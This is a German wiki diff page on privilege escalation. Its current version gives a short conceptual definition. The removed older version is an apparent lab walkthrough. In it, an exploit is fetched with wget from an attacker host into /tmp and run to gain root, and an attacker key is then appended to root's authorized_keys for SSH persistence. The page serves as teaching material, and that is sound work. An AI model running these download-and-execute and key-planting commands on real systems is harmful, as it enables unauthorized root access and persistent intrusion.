Privilege Escalation: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(6 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
=Wieder auf den Opfer=
+
=Was ist das?=
==Exploit runterladen und Ausführungsrecht geben==
 
*cd /tmp
 
*wget http://gaius/hack
 
*chmod +x hack
 
==Exploit ausfühen==
 
*./hack
 
*id
 
uid=0(root) gid=0(root) groups=0(root),33(www-data)
 
'''Wir sind nun root'''
 
==id.pub einbauen==
 
*wget http://gaius/root.key
 
*cat root.key >> /root/.ssh/authorized_keys
 
*ssh root@10.0.5.104
 
<pre>
 
The authenticity of host '10.0.5.104 (10.0.5.104)' can't be established.
 
ECDSA key fingerprint is SHA256:5gsfiKQ0L68lsHDiA1+Qw16XsWIhpfv+SzkFKzx/pGE.
 
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
 
Warning: Permanently added '10.0.5.104' (ECDSA) to the list of known hosts.
 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
 
  
* Documentation:  https://help.ubuntu.com/
+
*Bei einer Privilege Escalation (Rechteerweiterung) nutzt ein Angreifer Schwachstellen, Fehlkonfigurationen oder Designfehler aus, um auf einem System höhere Rechte zu erlangen.
 +
*Typische Ziele sind der Wechsel von einem eingeschränkten Benutzerkonto zu root oder Administratorrechten.
 +
*Privilege Escalation wird fast immer in Kombination mit anderen Angriffstechniken verwendet, um aus einem ersten Zugriff (z.B. nach Command Injection oder Initial Access) einen vollständigen Systemkompromiss zu erreichen.
 +
*Man unterscheidet zwischen '''horizontaler''' Privilege Escalation (gleichwertige Accounts kompromittieren) und '''vertikaler''' Privilege Escalation (höhere Berechtigungen erlangen).
 +
*Dieser Angriffstyp ist besonders gefährlich, weil er bestehende Schutzmechanismen wie Benutzerisolation, Rollenmodelle oder Containergrenzen direkt unterlaufen kann.
  
  System information as of Wed Sep 28 18:55:31 CEST 2022
+
=Beispiele=
 
+
*[[Privilege Escalation Beispiele]]
  System load:  0.03              Processes:              149
+
[[Kategorie:Privilege Escalation]]
  Usage of /:  22.5% of 17.59GB  Users logged in:        1
+
[[Kategorie:Privilege Hacking]]
  Memory usage: 25%                IP address for eth0:    10.0.5.104
+
[[Kategorie:Cybersecurity]]
  Swap usage:   0%                IP address for docker0: 172.17.42.1
+
[[Kategorie:Kali]]
 
 
  Graph this data and manage this system at:
 
    https://landscape.canonical.com/
 
 
 
You have mail.
 
Last login: Mon Jul  5 15:26:14 2021 from 10.0.10.2
 
</pre>
 

Aktuelle Version vom 18. Mai 2025, 17:09 Uhr

Was ist das?

  • Bei einer Privilege Escalation (Rechteerweiterung) nutzt ein Angreifer Schwachstellen, Fehlkonfigurationen oder Designfehler aus, um auf einem System höhere Rechte zu erlangen.
  • Typische Ziele sind der Wechsel von einem eingeschränkten Benutzerkonto zu root oder Administratorrechten.
  • Privilege Escalation wird fast immer in Kombination mit anderen Angriffstechniken verwendet, um aus einem ersten Zugriff (z.B. nach Command Injection oder Initial Access) einen vollständigen Systemkompromiss zu erreichen.
  • Man unterscheidet zwischen horizontaler Privilege Escalation (gleichwertige Accounts kompromittieren) und vertikaler Privilege Escalation (höhere Berechtigungen erlangen).
  • Dieser Angriffstyp ist besonders gefährlich, weil er bestehende Schutzmechanismen wie Benutzerisolation, Rollenmodelle oder Containergrenzen direkt unterlaufen kann.

Beispiele